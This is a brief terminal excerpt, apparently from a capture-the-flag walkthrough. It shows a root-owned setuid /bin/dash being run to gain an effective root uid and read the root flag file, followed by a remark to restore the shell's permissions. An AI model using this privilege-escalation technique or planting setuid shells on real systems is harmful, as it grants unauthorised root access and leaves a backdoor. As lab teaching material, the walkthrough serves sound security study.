-rwsr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ dash
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# cat /root/root.txt
4f4afb55463c3bc79ab1e906b074953d
uid and gid are still mindy, but euid is 0 (root), so the process runs with root privileges for as long as that shell lives. Put /bin/dash back the way it was afterwards (chmod 0755 /bin/dash): a setuid shell left behind is a persistent backdoor for anyone on the box.
End.